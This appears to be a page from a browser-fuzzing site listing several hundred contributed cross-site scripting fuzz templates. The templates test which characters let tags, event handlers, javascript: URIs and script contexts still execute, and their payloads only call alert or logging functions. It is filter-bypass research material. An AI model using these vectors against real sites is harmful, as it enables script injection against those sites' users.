Featured vector

Chrome 0.0
<Ffoo:img src="xx:xx" id="baz1" /> <script> if(document.getElementById("baz1")) { alert(1); } </script>

2,442,103 Successful fuzzes

All vectors

Description Vector Created by
Characters allowed at the start of a namespace <*chr*foo:img src="xx:xx" id="baz*num*" /> <script> if(document.getElementById("baz*num*")) { logChr(*num*); } </script> @agasfasgasdasds
test3_kinmen <!-- sample vector --> <img src=http://www.kinmen.gov.tw/*chr* onerror=logChr(*num*)> @kinmenhacker
String quotes in JS context <script>s*num* = *chr**num**chr*;if (typeof s*num* == "string" && s*num* == "*num*") logChr(*num*);</script> @blubbfiction
before_img <!-- sample vector --> <*chr*img src=xx:xx onerror=logChr(*num*)> @han7er
o replacement in event handlers <img src=xx:xx *chr*nerror=logChr(*num*)> @blubbfiction
Characters that close tags <script*chr*logChr(*num*)</script> @blubbfiction
Valid characters between attribute and value instead of <img src=xx:xx onerror*chr*logChr(*num*)> @blubbfiction
Replacement characters for between attribute and value <img src=xx:xx onerror*chr*logChr(*num*)> @blubbfiction
Characters that close a HTML comment 4 <!-- --*chr*> <img src=xxx:x onerror=log(*num*)> --> @irsdl
Characters that separate JavaScript object key and value <script> var obj = {"foo"*chr*"bar"}; logChr(*num*) </script> @peksa
JavaScript operators that separate objects and scopes <script> var v = {}*chr*{"string in blockscope"} logChr(*num*) </script> @peksa
JavaScript operators that evaluate argument in variable assignment <script> var v = {}*chr*logChr(*num*) </script> @peksa
Things that break from URIs javascript comments <a href="javascript://*chr*logChr(*num*)">aaa</a> @0xAli
Characters allowed between event handlers and equal sign <img src="about:blank" onerror*chr*=logChr(*num*)> @peksa
HTML input image tag attributes that run JavaScript <input *datahtmlattributes*="customLog('*datahtmlattributes*')" type="image" src="about:blank"> @peksa
HTML input tag attributes that run JavaScript <input *datahtmlattributes*="customLog('*datahtmlattributes*')" type="text"> @peksa
Characters that start JavaScript double quote strings <script> *chr*"; logChr(*num*) </script> @peksa
Characters that escape JavaScript single line comments <script> // hmm *chr*logChr(*num*) </script> @peksa
Ignored characters in javascript protocol uris <script> var a = document.createElement('a'); a.href = "java\u*hex4*script:alert()"; if (a.href === "javascript:alert()") { logChr(*num*); } </script> @peksa
Characters that escape html input tag <input value="" *chr*<script>logChr(*num*)</script> foo="" type="text"> @peksa
rand chr after opening tag <*chr*img/src=xx:xx on*chr*error=logChr(*num*)> @mehimansu
prompt <!-- sample vector --> <img src=xx:xx *chr*onerror=logChr(*num*)> @sharath_unni
replacement *chr*img src=xx:xx onerror=logChr(*num*)> @matttiko
Characters that close a HTML comment 0021 <!--*chr*><img src=xxx:x onerror=log(*num*)> --> @matttiko
script var separator <script> var a = "olol123*chr* <logChr(*num*)// </script> @i_bo0om
svg animate onbegin <svg id="svg" xmlns="http://www.w3.org/2000/svg"> <rect id="rectID" width="100" height="100" fill="green"> <animate id="selfID" onbegin=logChr(*num*) attributeName="x" begin="0s; selfID.end" dur="0.5s" from="0" to="100"/> </rect> </svg> @JohnathanKuskos
char after lt and before still valid html <*chr*,script>logChr(*num*);</script> @p_laguna
stuff <!-- sample vector --> <img src='xx:xx*chr*' onerror='logChr(*num*) baz= '> @largenocream
Characters that separate JavaScript assignment statements <script> var a={}*chr*b={}&logChr(*num*); </script> @Giutro
object data separator <object*chr*data="data:text/html;base64,PHNjcmlwdD5sb2dDaHIoKm51bSopPC9zY3JpcHQ+"></object> @i_bo0om
Characters that allow a new statement to begin2 <script> var a={}*chr*b=logChr(*num*); </script> @tifkin_
Characters that allow a new statement to begin <script> var a={}*chr*logChr(*num*); </script> @tifkin_
testquote <!-- sample vector --> <img src=xx:xx onerror=logChr(*num*)*chr*"> @matttiko
testabc <!-- sample vector --> <img src=xx:xx *chr*onerror=logChr(*num*)> @matttiko
Characters that can be used to terminate entities in an href <a href="javascript&colon*chr*log(*num*)" id="fuzzelement*num*">test</a> @tifkin_
Data URI What can replace the in data <script src="data*chr*,log(*num*)"></script> @skeptic_fx
Characters that can be used close tags2 <script>logChr(*num*)<*chr*script></script> @tifkin_
Characters allowed between and in HTML entities in style attribute <div style="x:expression(l&*chr*#x6F;gChr(*num*))"> @tifkin_
fssadf dfads fdasf <!-- sample vector --> <img src=xx:xx *chr*onerror=logChr(*num*)> @phpdevops
img tag overflow2 <img src=http://runinfinity.com/wp-content/uploads/2012/01/Kinmen_Marathon_coursemap.jpg *chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr* onerror=logChr(*num*)> @kinmenhacker
img tag overflow <img src=xx:xx *chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr* onerror=logChr(*num*)> @kinmenhacker
fuzzer set2 <article onerror=log(*num*) data-animal-type="bird"> <h1>k1nm3n h@ck3r</h1> <p>test</p> <table> <tr><td>datacsspropertynames</td><td>*datacsspropertynames*</td></tr> <tr><td>datadhtmlprops</td><td>*datadhtmlprops*</td></tr> <tr><td>dataentities</td><td>*dataentities*</td></tr> <tr><td>dataevents</td><td>*dataevents*</td></tr> <tr><td>dataevil</td><td>*dataevil*</td></tr> <tr><td>datahtmlattributes</td><td>*datahtmlattributes*</td></tr> <tr><td>datahtmlelements</td><td>*datahtmlelements*</td></tr> <tr><td>datahtmlelements2</td><td>*datahtmlelements2*</td></tr> <tr><td>dataints</td><td>*dataints*</td></tr> <tr><td>datajscsspropertynames</td><td>*datajscsspropertynames*</td></tr> <tr><td>datajsproperties</td><td>*datajsproperties*</td></tr> <tr><td>datajstest</td><td>*datajstest*</td></tr> <tr><td>datajstest2</td><td>*datajstest2*</td></tr> <tr><td>datajstest3</td><td>*datajstest3*</td></tr> <tr><td>datajstest4</td><td>*datajstest4*</td></tr> <tr><td>datajstest5</td><td>*datajstest5*</td></tr> <tr><td>datamyevents</td><td>*datamyevents*</td></tr> <tr><td>dataprotocols</td><td>*dataprotocols*</td></tr> <tr><td>dataShortHtmlAttributes</td><td>*dataShortHtmlAttributes*</td></tr> <tr><td>dataShortHtmlElements</td><td>*dataShortHtmlElements*</td></tr> <tr><td>datasvgelements</td><td>*datasvgelements*</td></tr> </table> </article> @kinmenhacker
html5 article <article onerror=log(*num*) data-animal-type="bird"> <h1>k1nm3n h@ck3r</h1> <p>test</p> <table> <tr><td>datacsspropertynames</td><td>*datacsspropertynames*</td></tr> <tr><td>datadhtmlprops</td><td>*datadhtmlprops*</td></tr> <tr><td>dataentities</td><td>*dataentities*</td></tr> <tr><td>dataevents</td><td>*dataevents*</td></tr> <tr><td>dataevil</td><td>*dataevil*</td></tr> <tr><td>datahtmlattributes</td><td>*datahtmlattributes*</td></tr> <tr><td>datahtmlelements</td><td>*datahtmlelements*</td></tr> <tr><td>datahtmlelements2</td><td>*datahtmlelements2*</td></tr> <tr><td>dataints</td><td>*dataints*</td></tr> <tr><td>datajscsspropertynames</td><td>*datajscsspropertynames*</td></tr> <tr><td>datajsproperties</td><td>*datajsproperties*</td></tr> <tr><td>datajstest</td><td>*datajstest*</td></tr> <tr><td>datajstest2</td><td>*datajstest2*</td></tr> <tr><td>datajstest3</td><td>*datajstest3*</td></tr> <tr><td>datajstest4</td><td>*datajstest4*</td></tr> <tr><td>datajstest5</td><td>*datajstest5*</td></tr> <tr><td>datamyevents</td><td>*datamyevents*</td></tr> <tr><td>dataprotocols</td><td>*dataprotocols*</td></tr> <tr><td>dataShortHtmlAttributes</td><td>*dataShortHtmlAttributes*</td></tr> <tr><td>dataShortHtmlElements</td><td>*dataShortHtmlElements*</td></tr> <tr><td>datasvgelements</td><td>*datasvgelements*</td></tr> </table> </article> @kinmenhacker
Connect back <img src="http://140.134.25.107/?chr=*chr*&num=*num*" onerror=logChr(*num*)> @kinmenhacker
Test iOS html5 <audio controls> <source src="*chr*.*chr*" type="*chr*/*chr*" onerror= log(*num*)> Your browser does not support the audio element. </audio> @kinmenhacker
Separators <svg*chr*onload=logChr(*num*)> @JohnathanKuskos
digits <script>/^\d$/.test('*chr*')&&logChr(*num*);</script> @garethheyes
new lines <script> if(/\s/.test('*uni*')&&!/./.test('*uni*'))logChr(*num*) </script> @garethheyes
spaces <script> if(/\s/.test('*chr*'))logChr(*num*) </script> @garethheyes
Characters to break VBScript comments <script language="vbscript"> '*chr*log(*num*)' </script> @0x6D6172696F
Characters preceding function call inside throw block <body onload=throw[onerror=a=*chr*logChr(*num*),a]> @JohnathanKuskos
chr before alert(1) <input onfocus=*chr*:alert(1) autofocus> @Mramydnei
character between two URI <a href="http://*chr*javascript:alert(1)">testxss</a> @Mramydnei
characters that behave like equal signs in attribute value <img src== onerror="a*chr*logChr(*num*)"> @JohnathanKuskos
test for progress <progress value="*num*" max="*num*"></progress> @kinmenhacker
test for tag name <*chr* width="*num*px">*datajstest4**datajstest4**datajstest4**dataShortHtmlAttributes**dataShortHtmlAttributes**dataShortHtmlAttributes**datajstest4* @kinmenhacker
Characters that dont inhibit eventhandlers <img src=xx:xx o*chr*nerror=logChr(*num*)> @tifkin_
im fish <!-- sample vector --> <img src=xx:xx *chr*onerror=logChr(*num*)> @Mramydnei
wwwemogiccom <!-- sample vector --> <img src=xx:xx *chr*onerror=logChr(*num*)>*num**datajstest4**datacsspropertynames**datacsspropertynames* @vpelss
Characters that make a double quote valid <script> *chr*"; logChr(*num*); </script> @tifkin_
Characters allowed after domain <a href="http://google.com*chr*breakme" id="fuzzelement*num*">test</a> @avlidienbrunn
Characters allowed before http <a href="http://*chr*google.com" id="fuzzelement*num*">test</a> @avlidienbrunn
Characters that will be mutated to a correct URI 5 <ifr*chr*ame id="lol*num*" src="http://shazzer.co.uk" onload=logChr(*num*);> <i>:)</i> </iframe> @avlidienbrunn
Characters that will be mutated to a correct URI 4 <script> function report*num*(num){ var lol = document.getElementById('lol*num*'); if(/http:\/\/shazzer/.test(lol.src)){ logChr(*num*); } } </script> <iframe id="lol*num*" src="http://*chr*shazzer.co.uk" onload=report*num*(*num*)> <p>The browser does not support iframes.</p> </iframe> @avlidienbrunn
XSS Vector Command Tag <command onmouseover ="\x6A\x61\x76\x61\x53\x43\x52\x49\x50\x54\x26\x63\x6F\x6C\x6F\x6E\x3B\x63\x6F\x6E\x66\x69\x72\x6D\x26\x6C\x70\x61\x72\x3B\x31\x26\x72\x70\x61\x72\x3B">Save</command>*datajscsspropertynames* @rafaybaloch
Characters that will be mutated to a correct URI 3 <script> function report*num*(num){ var lol = document.getElementById('lol*num*'); if(/uk\//.test(lol.src)){ logChr(*num*); } } </script> <iframe id="lol*num*" src="http://shazzer.co.uk*chr*break" onload=report*num*(*num*)> <p>The browser does not support iframes.</p> </iframe> @avlidienbrunn
Characters that can be used close tags <script>logChr(*num*)<*chr*script> @tifkin_
Characters allowed to hex encodings of javascript variables <script> lo\u*chr*0067Chr(*num*); </script> @tifkin_
Characters allowed to hex encode javascript <script> lo\*chr*0067Chr(*num*); </script> @tifkin_
Characters allowed in between dashes to end html comments <!-- -*chr*-> <script>logChr(*num*)</script> --> @JohnathanKuskos
Characters allowed between JS function names and parentheses <script> logChr*chr*(*num*); </script> @tifkin_
Protocols before Javascript to run code by using Flash navigateURL <script> setTimeout("if(document.getElementById('myframe*dataprotocols*').contentWindow.document.location.hash.substring(1)) customLog('*dataprotocols*');",1000) </script> <iframe id="myframe*dataprotocols*" src="http://victim.com/testme/flashtest/link_protocol_test.swf?input=*dataprotocols*javascript:document.location='http://shazzer.co.uk/%23@irsdl'"></iframe> @irsdl
Characters allowed before script tag name <*chr*script> logChr(*num*) </script> @tifkin_
chars allowed between js comment v2 <script>logChr(*num*)*chr*'</script> @insertScript
chars allowed between js comment <script>logChr(*num*)/*chr*/'</script> @insertScript
allowed char in js comment <script>logChr(*num*)<*chr*!-- '</script> @insertScript
Characters that result in multiline strings <script> var a = "*chr* "; logChr(*num*); </script> @tifkin_
Characters that complete single quote <script> var a=*chr*'; logChr(*num*); </script> @tifkin_
Characters allowed between property accessor and property <script> if(document.*chr*body === document.body) { logChr(*num*); } </script> @tifkin_
Characters that escape escapes <script> var x = "*chr*\"; logChr(*num*); </script> @JohnathanKuskos
Characters that break out of quoted attributes2 <img src="1*chr* onerror="logChr(*num*)"> @tifkin_
img onload with only one char in src <img src=*chr* onload=logChr(*num*)> @insertScript
Characters allowed between 2 consecutive functions <script> function a() {} </script> <img src=1 onerror="a()*chr*logChr(*num*)"> @tifkin_
Characters allowed before single functions in event handlers <img src=1 onerror="*chr*logChr(*num*)"> @tifkin_
Characters that can set event handlers3 <img src=1 onerror*chr*"logChr(*num*)"> @tifkin_
characters which turn into a comment <svg><script>lo<*chr*>gChr(*num*)</script></svg> @insertScript
Characters that break attribute names <img src=# aaa*chr*onerror="logChr(*num*)"> @albinowax
char after lt still valid html <*chr*a href=x onerror=logChr(*num*)> @ethicalhack3r
Characters allowed after string multiline separator <script> var x = "asdf\*chr* asdf"; logChr(*num*); </script> @tifkin_
Characters allowed between attributes <img*chr*src=xx:xx*chr*onerror=logChr(*num*)> @tifkin_
lt eating char log <img src=x *chr*> onerror="console.log(document.getElementsByTagName('html')[0].innerHTML)"> @insertScript
Characters not encoded with encodeURIComponent <script> chr=String.fromCharCode(*num*); result=''; try{ result=encodeURIComponent(chr); }catch(e){} if(!/%/.test(result)&&result.length) { ids.push(*num*); } </script> @garethheyes
Characters not encoded with encodeURI <script> chr=String.fromCharCode(*num*); result=''; try{ result=encodeURI(chr); }catch(e){} if(!/%/.test(result)&&result.length) { ids.push(*num*); } </script> @garethheyes
lt eating char v2 <img src=x *chr*> onerror=logChr(*num*)> @insertScript
lt eating char <img src=x *chr*> onerror=logChr(*num*)> @insertScript
Characters after javascript uri <a href="javascript*chr*:alert(1)" id="fuzzelement*num*">test</a> @insertScript
characters allowed in html entities <a href="javascript&co*chr*lon;alert(1)" id="fuzzelement*num*">test</a> @insertScript
Characters before javascript uri <a href="*chr*javascript:alert(1)" id="fuzzelement*num*">test</a> @insertScript
Easter challenge min sequence 2 <script> str=*datajstest*+*datajstest2*+*datajstest3*+*datajstest4*+''; result=''; try{result=eval(str)}catch(e){}; if(result === 2147483647) { customLog(str); } </script> @garethheyes
Easter challenge min sequence <script> str=*datajstest*+*datajstest2*+*datajstest3*+*datajstest4*+*datajstest5*+''; result=''; try{result=eval(str)}catch(e){}; if(result === 2147483647) { customLog(str); } </script> @garethheyes
SVG script <svg><script*chr*>logChr(*num*)</script></svg> @garethheyes
Entities allowed with no semi colon htmlStr = '<div title="'+*dataentities*.replace(/;/,'')+'">test</div>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.title.length===1) { customLog(*dataentities*); } }catch(e){}; @garethheyes
HTML Entity in between and <img src=xx:xx onerror="&*chr*#X61;lert(*num*);logChr(*num*)"> @MisterJyu
JS Property check middle character <img src=xx:xx onerror=window[['log*chr*Chr']](*num*)> @garethheyes
JS Property check ending character <img src=xx:xx onerror=window[['logChr*chr*']](*num*)> @garethheyes
Characters allowed before slashes no protocol <a href="*chr*//google.com" id="fuzzelement*num*">test</a> @garethheyes
Characters allowed inside slashes no protocol <a href="/*chr*/google.com" id="fuzzelement*num*">test</a> @garethheyes
Characters allowed instead of slash 2 <a href="http:*chr**chr*google.com" id="fuzzelement*num*">test</a> @garethheyes
Characters allowed instead of slash <a href="http:*chr*google.com" id="fuzzelement*num*">test</a> @garethheyes
Characters allowed after slash <a href="http:/*chr*/google.com" id="fuzzelement*num*">test</a> @garethheyes
Characters allowed inside http <a href="ht*chr*tp://google.com" id="fuzzelement*num*">test</a> @garethheyes
Characters allowed within an attribute name (on()load) "'><img src="xx:xx" on*chr*error="log(*num*);"> @skeptic_fx
Characters transformed in expando attributes <div id="fuzzelement*num*" expando*chr*="123">test</div> @garethheyes
Expandos attributes characters removed <div id="fuzzelement*num*" expando*chr*=123>test</div> @garethheyes
Valid chars before img word in img tag <!-- sample vector --> <*chr*img src=xx:xx onerror=logChr(*num*)> @ontrif
Equals equivalent signs in attributes <!-- sample vector --> <img src=xx:xx onerror*chr*logChr(*num*)> @WisecWisec
meta refresh tag content attribute url overwrite <!-- sample vector --> <META HTTP-EQUIV="refresh" CONTENT="0.1; URL=javascript:void()//?*chr*;URL=javascript:logChr(*num*)//"> @olemoudi
is my browser leaking location <iframe src=http://businessinfo.co.uk onload="if(/^http:\/\/businessinfo.co.uk\/?/.test(this.contentWindow.location)){logBoolean(true);}else{logBoolean(false)}"></iframe> @garethheyes
Characters between time and URL in meta redirects <meta http-equiv=refresh content="0*chr*javascript:logChr('*num*')"> @avlidienbrunn
Characters allowed inside jsurl <a href="java*chr*script:alert(1)" id="fuzzelement*num*">test</a> @avlidienbrunn
justatest2 <!-- sample vector --> <img*chr*src=xx:xx onerror=logChr(*num*)> @evilcos
Characters allowed instead of forward slash in url <a href="*chr**chr*google.com" id="fuzzelement*num*">test</a> @garethheyes
Characters allowed instead of colon in js url <a href="javascript*chr*alert(1)" id="fuzzelement*num*">test</a> @garethheyes
Cookie fuzzing <script> document.cookie='*chr*'; if(document.cookie !== '*chr*') { logChr(*num*,document.cookie); } </script> @garethheyes
Tags that have the onload event <*datahtmlelements* onload="customLog('*datahtmlelements*')">test</*datahtmlelements*> @garethheyes
chars allowed after colon v2 htmlStr = '<a href="javascript&colon'+*chr*+'123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { logChr(*num*); } }catch(e){}; @heyheyheyhey10
chars allowed in colon v2 htmlStr = '<a href="javascript&col'+*chr*+'on;123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { logChr(*num*); } }catch(e){}; @heyheyheyhey10
chars allowed after colon htmlStr = '<a href="javascript&colon'+*chr*+'123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { logChr(*chr*); } }catch(e){}; @heyheyheyhey10
Characters consuming spaces between lt and tag name <*chr* script>logChr(*num*)</script> @blubbfiction
Characters allowed as vbscript variables <img src=x:xx onerror="try {execScript('*chr*=1','vbs');log(*num*);}catch(e){}"> @garethheyes
possible chars in base64 encoding <svg><script xlink:href=YWxl*chr*cnQoMSk= ></script> @heyheyheyhey10
Replacement for s in script tag <*chr*cript>logChr(*num*)</script> @blubbfiction
Replacement for lt in tag *chr*script>logChr(*num*)</script> @blubbfiction
Characters inside script tag name <scr*chr*ipt>logChr(*num*)</script> @blubbfiction
Characters between lt and tag name <*chr*script>logChr(*num*)</script> @blubbfiction
char for firing onload event <img src=*chr* onload=logChr(*num*)> @heyheyheyhey10
aaaaa <!-- sample vector --> <img src=xx:xx *chr*onerror=logChr(*num*)> @goroasd
html dataentities before event handler <img src="x" asdf/="_=" alt=" *dataentities*onerror=logChr(*num*) //"> @testacc40590139
Entities allowed instead of colon for js protocol htmlStr = '<a href="javascript'+*dataentities*+'123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { customLog(*dataentities*); } }catch(e){}; @peksa
Entities allowed after js protocol htmlStr = '<a href="javascript'+*dataentities*+':123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { customLog(*dataentities*); } }catch(e){}; @garethheyes
Entities allowed before js protocol htmlStr = '<a href="'+*dataentities*+'javascript:123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { customLog(*dataentities*); } }catch(e){}; @garethheyes
Entities allowed inside js protocol htmlStr = '<a href="java'+*dataentities*+'script:123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { customLog(*dataentities*); } }catch(e){}; @garethheyes
Entities allowed before CSS rule htmlStr = '<div style="'+*dataentities*+'color:#cccccc;"></div>'; document.getElementById('placeholder').innerHTML = htmlStr; if(document.getElementById('placeholder').firstChild.style.color.length) { customLog(*dataentities*); } @garethheyes
img srcX onerroralert(1) <div style="color:red'{}*chr* x:expression(logChr(*num*))*chr*">.</div> @qbye
Break out of HTML element from single quoted attribute <img src='xx:x*chr*><img src=xx:x onerror=logChr(*num*)>'> @peksa
Escaped characters that break out of single quote HTML attribute <img src='xx:x\*chr* onerror="logChr(*num*)">'> @peksa
Characters that escape single quoted HTML attributes <img src='xx:x*chr* onerror="logChr(*num*)">'> @peksa
Marios challenge <*datahtmlelements* value="1" *datadhtmlprops*="test" *dataevents*="test" *datahtmlattributes*="test">1</*datahtmlelements*><script>if(test == "1") parent.customLog('<*datahtmlelements* value="1" *datadhtmlprops*="test" *dataevents*="test" *datahtmlattributes*="test">1</*datahtmlelements*>');</script> @0xAli
Characters syntactically equivalent to double quote in HTML attributes `"'><img src="#*chr* onerror=log(*num*)> @p_laguna
Eating backslash <img src=xx:xx onerror="x='*chr*\',logChr(*num*)//'"> @garethheyes
Character allowed after the slash for end script tag <script>alert(logChr(*num*))</*chr*script> @MisterJyu
Character allowed before the slash for end script tag <script>alert(logChr(*num*))<*chr*/script> @MisterJyu
Characters that break out of script variables <script>x='<*chr*script><img src=xx:xx onerror=logChr(*num*)>';</script> @garethheyes
Char that allows you to act as a slash in closing tag 2 <script>log(*num*)<*chr*script></script> @notxssninja
Characters that close a HTML comment 3 --><!-- -*chr*-> <img src=xxx:x onerror=log(*num*)> --> @DOMXss
Characters that are spaces <img src=xx:xx onerror="*num*<=0xffff&&/./.test('*uni*')&&/\s/.test('*uni*')&&logChr(*num*)"> @garethheyes
Characters that are new lines <img src=xx:xx onerror="!/./.test('*uni*')&&/\s/.test('*uni*')&&logChr(*num*)"> @garethheyes
Attribute separators <img*chr*src=xx:xx*chr*onerror=logChr(*num*)> @garethheyes
Characters separating attributes without quotes after hash <img src=xx:xx#*chr*/onerror=logChr(*num*)> @garethheyes
Characters separating attributes without quotes <img src=xx:xx alt=`*chr*/onerror=logChr(*num*)//`> @garethheyes
JS in img src for selfxss <img src="http://media.merchantcircle.com/37102644/Alert1_Logo_without_tag_full.jpeg*chr*javascript:alert(*chr*)"> @ethicalhack3r
Char after lt <*chr*script>alert(*num*)</script> @ethicalhack3r
Determine what character can be at the end of the javascript but before the colon <!-- sample vector --> <img src=xx:xx *chr*onerror=logChr(*num*)> <a href=javascript*chr*:alert(*num*)>*num*</a> @MisterJyu
Characters allowed as slash in url <script> !function(){ var a = document.createElement('a'); a.href='http://\*chr*somehost.com'; if(a.protocol === 'http:' && a.host === '/somehost.com') { logChr(*num*); } }() </script> @garethheyes
Characters allowed as gt in url <script> !function(){ var a = document.createElement('a'); a.href='http://\*chr*somehost.com'; if(a.protocol === 'http:' && a.host === '>somehost.com') { logChr(*num*); } }() </script> @garethheyes
Characters allowed as lt in url <script> !function(){ var a = document.createElement('a'); a.href='http://\*chr*somehost.com'; if(a.protocol === 'http:' && a.host === '<somehost.com') { logChr(*num*); } }() </script> @garethheyes
Characters allowed as _ in url <script> !function(){ var a = document.createElement('a'); a.href='http://\*chr*somehost.com'; if(a.protocol === 'http:' && a.host === '_somehost.com') { logChr(*num*); } }() </script> @garethheyes
Characters allowed as s in url <script> !function(){ var a = document.createElement('a'); a.href='http://\*chr*omehost.com'; if(a.protocol === 'http:' && a.host === 'somehost.com') { logChr(*num*); } }() </script> @garethheyes
Characters allowed as h in http <script> !function(){ var a = document.createElement('a'); a.href='\*chr*ttp://somehost.com'; if(a.protocol === 'http:' && a.host === 'somehost.com') { logChr(*num*); } }() </script> @garethheyes
Characters allowed after colon in url (no slashes) <script> !function(){ var a = document.createElement('a'); a.href='http:\*chr*somehost.com'; if(a.host === 'somehost.com') { logChr(*num*); } }() </script> @garethheyes
Characters allowed after slash in url <script> !function(){ var a = document.createElement('a'); a.href='http://\*chr*somehost.com'; if(a.host === 'somehost.com') { logChr(*num*); } }() </script> @garethheyes
Characters allowed after colon in url <script> !function(){ var a = document.createElement('a'); a.href='http:\*chr*//somehost.com'; if(a.host === 'somehost.com') { logChr(*num*); } }() </script> @garethheyes
Characters allowed between slashes <script> !function(){ var a = document.createElement('a'); a.href='/\*chr*/somehost.com'; if(a.host === 'somehost.com') { logChr(*num*); } }() </script> @garethheyes
Characters to end script tag via JavaScript regex 002 <script>log(*num*,1</script*chr*//)</script> @0x6D6172696F
Characters to end script tag via JavaScript regex 001 <script>log(*num*,1</script*chr*/)</script> @0x6D6172696F
foobar <!-- sample vector --> <img src=xx:xx *chr*onerror=logChr(*num*)>*datadhtmlprops**datadhtmlprops**datadhtmlprops**datadhtmlprops**hex6**uni* @Sidhpurwala
Execute XSS through previousSibling replace in DOM using innerHTML and escaping right angle bracket <body> §iframe onload=confirm(/xss/)&gt; <img src=x:x onerror="innerHTML=previousSibling.nodeValue.replace('§','<')"> </body> *urlenc* @secalert
Hex characters allowed after asterisk in CSS comments <div id="fuzzelement*num*" style="/**\*hex2*/;color:#000000;"></div> @garethheyes
Characters allowed after asterisk in CSS comments <div id="fuzzelement*num*" style="/***chr*/;color:#000000;"></div> @garethheyes
Iframe contentDocument properties <iframe src="http://businessinfo.co.uk" id="iframe"></iframe> <script> window.addEventListener('load', function(){ props=props.concat(Object.getOwnPropertyNames(document)); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ try{ if(document.getElementById('iframe').contentDocument[arguments[0]])customLog(arguments[0]); }catch(e){}; }) }, false); </script> @garethheyes
Iframe contentWindow properties <iframe src="http://businessinfo.co.uk" id="iframe"></iframe> <script> window.addEventListener('load', function(){ props=props.concat(Object.getOwnPropertyNames(document)); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ try{ if(document.getElementById('iframe').contentWindow[arguments[0]])customLog(arguments[0]); }catch(e){}; }) }, false); </script> @garethheyes
Document body variables <script> props=props.concat(Object.getOwnPropertyNames(document.body)); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ if(document.body[arguments[0]])customLog(arguments[0]); }) </script> @garethheyes
Document variables <script> props=props.concat(Object.getOwnPropertyNames(document)); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ try{ if(document[arguments[0]])customLog(arguments[0]); }catch(e){}; }) </script> @garethheyes
Function variables <script> props=props.concat(Object.getOwnPropertyNames(function(){})); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ if(function(){}[arguments[0]])customLog(arguments[0]); }) </script> @garethheyes
Object variables <script> props=props.concat(Object.getOwnPropertyNames({})); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ if({}[arguments[0]])customLog(arguments[0]); }) </script> @garethheyes
Number variables <script> props=props.concat(Object.getOwnPropertyNames(new Number(123))); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ if((123)[arguments[0]])customLog(arguments[0]); }) </script> @garethheyes
String variables <script> props=props.concat(Object.getOwnPropertyNames(window)); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ if(''[arguments[0]])customLog(arguments[0]); }) </script> @garethheyes
Regexp variables <script> props=props.concat(Object.getOwnPropertyNames(/a/)); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ if(/a/[arguments[0]])customLog(arguments[0]); }) </script> @garethheyes
Array variables <script> props=props.concat(Object.getOwnPropertyNames([])); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ if([][arguments[0]])customLog(arguments[0]); }) </script> @garethheyes
Window variables <script> props=props.concat(Object.getOwnPropertyNames(window)); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ if(window[arguments[0]])customLog(arguments[0]); }) </script> @garethheyes
aaaaaaaa <b id="id1" x=begin0x9fa0end >`'"></b><script>if (!/begin.end/.test(document.getElementById('id1').getAttribute('x'))) { alert(1);}</script> @PunchyStickMeh
prime browser <b id="id1" x=begin0x2924end >`'"></b><script>if (!/begin.end/.test(document.getElementById('id1').getAttribute('x'))) { alert(1);}</script> @thetestmanager
Alternatives to in attributes <img src=# onerror*chr*"log(*num*)" > @albinowax
Break out of title <title>hello*chr*<*chr**raw1*><script>alert(*num*)</script></title> @0xAli
